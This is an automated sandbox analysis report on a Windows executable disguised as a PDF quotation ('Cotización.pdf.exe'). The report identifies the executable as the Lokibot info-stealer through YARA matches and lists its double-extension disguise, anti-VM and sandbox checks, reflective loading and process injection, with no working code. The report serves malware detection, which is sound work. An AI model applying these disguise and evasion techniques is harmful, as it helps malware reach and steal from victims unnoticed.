              Source: Cotizaci#U00f3n.pdf.exe, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Source: 2.0.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Source: 9.0.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Source: 9.2.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.c20000.1.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Source: 12.0.Cotizaci#U00f3n.pdf.exe.c20000.0.unpack, uNotepad/CollectionToSort.cs Long String: Length: 32771
              Initial sample is a PE file and has a suspicious name
              Source: initial sample Static PE information: Filename: Cotizaci#U00f3n.pdf.exe
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Code function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe Code function: String function: 00405B6F appears 42 times
              Source: Cotizaci#U00f3n.pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.297991546.00000000074C0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000000.196617328.00000000008AF000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.289124897.0000000003023000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameResource_Meter.dll> vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.297202205.00000000070E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 00000009.00000000.283640201.000000000028F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.461566334.0000000000D2F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe Binary or memory string: OriginalFilenameBLjtZ.exe2 vs Cotizaci#U00f3n.pdf.exe
              Source: Cotizaci#U00f3n.pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE, date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Loki_1, author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Lokibot, hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@137/3
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,12_2_0040650A
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,12_2_0040434D
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cotizaci#U00f3n.pdf.exe.logJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: unknownProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe 'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe'
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Cotizaci#U00f3n.pdf.exeStatic file information: File size 1104896 > 1048576
              Source: Cotizaci#U00f3n.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation:

              .NET source code contains potential unpacker
              Source: Cotizaci#U00f3n.pdf.exe, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.0.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 2.2.Cotizaci#U00f3n.pdf.exe.7a0000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 9.0.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 9.2.Cotizaci#U00f3n.pdf.exe.180000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 12.2.Cotizaci#U00f3n.pdf.exe.c20000.1.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 12.0.Cotizaci#U00f3n.pdf.exe.c20000.0.unpack, uNotepad/Form1.cs.Net Code: GGGGGGGGGGGGGGGGGGGG System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Yara detected aPLib compressed binary
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.Cotizaci#U00f3n.pdf.exe.3f7b4b8.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 2644, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 3492, type: MEMORY
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AD4
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00402AC0 push eax; ret 12_2_00402AFC
              Source: initial sampleStatic PE information: section name: .text entropy: 7.67256143073

              Hooking and other Techniques for Hiding and Protection:

              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: pdf.exeStatic PE information: Cotizaci#U00f3n.pdf.exe
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion:

              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 3492, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe TID: 3840Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe TID: 4788Thread sleep time: -1440000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,12_2_00403D74
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeThread delayed: delay time: 60000Jump to behavior
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: Cotizaci#U00f3n.pdf.exe, 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_0040317B mov eax, dword ptr fs:[00000030h]12_2_0040317B
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 12_2_00402B7C GetProcessHeap,RtlAllocateHeap,12_2_00402B7C
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMemory written: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: Cotizaci#U00f3n.pdf.exe, 0000000C.00000002.462567944.0000000001A00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
